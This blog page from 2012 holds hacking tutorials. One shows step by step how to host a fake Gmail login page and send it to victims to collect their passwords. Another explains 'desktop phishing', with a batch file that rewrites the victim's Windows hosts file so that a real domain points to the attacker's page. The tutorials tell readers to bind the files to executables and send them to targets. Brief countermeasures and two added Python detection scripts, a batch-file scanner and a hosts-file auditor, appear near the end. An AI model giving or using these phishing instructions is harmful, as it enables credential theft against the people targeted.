ALLHACKD: December 2012

The Art Of Intrusion

Monday, 31 December 2012

Click on image to download E-book
Sorry, but this download has been held or deleted from the server due to copyrighted content.



Gmail Phishing

 
In my previous article I taught you how to make a phishing site (the article is here). In this article I am going to teach you how to set up the phishing site, which is a more difficult task than making one.

Step 1: The first step in making the site is to register an account at http://www.000webhost.com/order.php (if you already have an account, you can skip the first 2 steps).

Step 2: Now go to the email account that you gave and confirm your account with the confirmation link.

Step 3: Now download this Gmail FILE.

Step 4: Now go to http://members.000webhost.com/ and log into your account.

Step 5: Once you are logged into your account, click on Go to Cpanel in front of the domain that you registered, and then go to Another File Manager under Files and log into it.

Step 6: Now click on Public_HTML.

Step 7: Now click on the Upload button and, under Archives, choose the file that you downloaded to be uploaded (PHP file, text file, HTML file).

Step 8: Now anyone who visits your site will be taken to the fake Gmail login page. After they enter their username and password, they will be taken to another page that shows them an error, so there is less chance that it will be detected. (Send the domain name or URL to the victim.)

Fake login page


 ========================================================
The input data (email and password) will look like the following:

Email:xyz@abc.com    Password:123456789

If you don't know how to get the ID and password, follow steps 5 and 6, then click on the text file in the public folder.

Desktop Phishing

Friday, 21 December 2012


You may already be familiar with the phishing technique, as I have posted some articles on it (the articles are here). However, if you still have not understood it, I should tell you again that phishing is an act where a hacker makes a duplicate page, specifically the login page, of a website and changes the login fields: he embeds a logger script in those login form fields, so whatever you type in those fields is logged and pasted into a text file on the server where the duplicate phishing page is hosted to fool you. Thus your email and password are sent to the hacker, as those login fields are for "email address" and "password", and in the end you are redirected to the original login page. You should read the following posts to understand this in detail:-



In phishing :-


1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2. Victim enters his credentials in fake login page that goes to attacker.
3. Victim is then redirected to an error page or genuine website depending on attacker.

But the main drawback of phishing is that the victim can easily differentiate between the fake and the real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.


In desktop phishing:-



1. Attacker sends an executable/batch file to the victim and the victim is supposed to double click on it. Attacker's job is done.
2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn't come to know.
3. The rest is the same as in normal phishing.

What is Hosts File?
The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com, a query is sent to the Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.

Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.

 
What is the attack?
I hope you have got an idea of how modification of this hosts file on the victim's computer can be misused. We need to modify the victim's hosts file by adding the original domain name and the IP address of our fake website/phishing page. Whenever the victim visits the original website, he would be directed to our fake login page, and the domain name in the URL box would remain the original as typed by the victim. Hence the domain name is spoofed.
 
Two steps to perform the attack:-
1. Create and host the phishing page on your computer.
2. Modify the victim's hosts file.
 
Webhosting sites like 110mb.com, ripway.com etc., where we usually upload our phishing page, do not provide an IP that points to the fake website, like www.anything.110mb.com. An IP address points to a web server and not a website. So we need to host the phishing page on our computer using web server software like WAMP or XAMPP.
Kindly read my simple tutorial on setting up the XAMPP web server here and this step will be clear to you.

Step 2. This step can be performed in two different ways.

Method 1 - Send the victim a zip file containing a modified hosts file. When the zip file is clicked, it automatically replaces the victim's original hosts file with the modified hosts file.

Copy your hosts file and paste it anywhere. Edit it with any text editor and associate your public IP address with the domain you wish, as shown.

In this case, when the victim visits gmail.com, he would be taken to the website hosted on IP 'xxx.xxx.xxx.xxx'. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location C:\Windows\system32\drivers\etc and the victim's hosts file gets replaced by our modified hosts file.

Then you can bind this file with any exe (using a binder) or directly give it to the victim. He is supposed to click it and you are done.

Method 2 - Create a batch file which would modify the hosts file as per your need.
Open Notepad and type the following text:

echo xxx.xxx.xxx.xxx www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
Obviously, replace these with your own IP and website.

Save the file as 'all files' instead of a txt file and name it anything.bat. The extension must be .bat.
When the victim runs this file, a new entry will be made in the hosts file.

You can test both the above methods to modify your own hosts file
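Method 2 leaves a recognisable trace in the script itself: a redirection into drivers\etc\hosts. The following added example (not from the original post; the function name, patterns and sample script are constructed for illustration) is a static check that a mail gateway or triage job could run over batch attachments to flag lines that write to the hosts file.

```python
import re

# Any reference to the hosts file, whatever the prefix (C:\Windows, %SystemRoot%, ...).
HOSTS_REF = re.compile(r'[\\/]drivers[\\/]etc[\\/]hosts(?![\w.])', re.IGNORECASE)
# Output redirection (> or >>) whose target is the hosts file.
REDIRECT = re.compile(
    r'(>{1,2})\s*"?[^\s">|&]*[\\/]drivers[\\/]etc[\\/]hosts(?![\w.])', re.IGNORECASE)
# File-copy commands that could replace the hosts file.
COPY = re.compile(r'^@?(copy|xcopy|move|robocopy)\b', re.IGNORECASE)
# Batch comments: rem ... or :: ...
COMMENT = re.compile(r'^@?(rem\b|::)', re.IGNORECASE)

# Constructed sample script (203.0.113.0/24 is a documentation address range).
SAMPLE_BAT = r"""@echo off
rem constructed sample for the scanner
echo 203.0.113.50 www.watever.com >> C:\windows\system32\drivers\etc\hosts
copy /y hosts.new "%SystemRoot%\System32\drivers\etc\hosts"
type C:\Windows\System32\drivers\etc\hosts
echo done > C:\temp\log.txt
"""

def scan_script(text):
    """Return (line_no, kind, line) for each line that touches the hosts file."""
    hits = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if COMMENT.match(line) or not HOSTS_REF.search(line):
            continue
        redirect = REDIRECT.search(line)
        if redirect:
            kind = "append" if redirect.group(1) == ">>" else "overwrite"
        elif COPY.match(line):
            kind = "copy"
        else:
            kind = "reference"  # e.g. `type ...\hosts`: read-only, lowest priority
        hits.append((line_no, kind, line))
    return hits

if __name__ == "__main__":
    for line_no, kind, line in scan_script(SAMPLE_BAT):
        print(f"{line_no}: [{kind}] {line}")
```

Because `echo` is a cmd.exe built-in, the append does not start a new process, so this kind of content inspection (or file-change monitoring on the hosts file) catches what process command-line logging alone would miss.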

 
Limitations of the attack:-
1. Our public IP address is most probably dynamic, so it changes every time we disconnect and reconnect. To overcome this we need to purchase a static IP from our ISP.
2. The browser may warn the victim that the digital certificate of the website is not genuine.

Countermeasures:-
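Never just blindly enter your credentials in a login page, even if you yourself have typed the domain name in the web browser. Check whether the protocol is "HTTP" or "HTTPS". HTTPS is secure. Over HTTPS, a hosts-file redirect to a server that does not hold the genuine site's certificate produces the browser certificate warning mentioned under the limitations, so do not click through that warning.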
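A hosts-file redirect of the kind described above can also be found after the fact by auditing the file. The following added example (not from the original post) parses hosts-file text and reports entries that pin a watched domain, or any of its subdomains, to a non-loopback address; the watchlist and the sample content are assumptions made for the example.

```python
import ipaddress
import os

# Path as given on the page; the watchlist is an illustrative assumption.
HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"
WATCHLIST = {"gmail.com", "google.com"}

# Constructed sample input (203.0.113.0/24 is a documentation address range).
SAMPLE_HOSTS = """\
# constructed sample, not from a real machine
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net
203.0.113.50    www.gmail.com    # override of a watched domain
203.0.113.50    GMAIL.com
10.0.0.5        intranet.example.local
"""

def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an IP address: not a mapping
        for name in fields[1:]:
            yield line_no, ip, name.lower().rstrip(".")

def audit_hosts(text, watchlist=WATCHLIST):
    """Return (line_no, ip, hostname) for watched names pinned to a routable IP."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue  # 127.0.0.1 / 0.0.0.0 entries are usually blocklists
        labels = name.split(".")
        # Match the watched domain itself or any subdomain of it.
        if any(".".join(labels[i:]) in watchlist for i in range(len(labels))):
            findings.append((line_no, str(ip), name))
    return findings

if __name__ == "__main__":
    text = SAMPLE_HOSTS
    if os.path.exists(HOSTS_PATH):
        with open(HOSTS_PATH, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    for line_no, ip, name in audit_hosts(text):
        print(f"line {line_no}: {name} is pinned to {ip}")
```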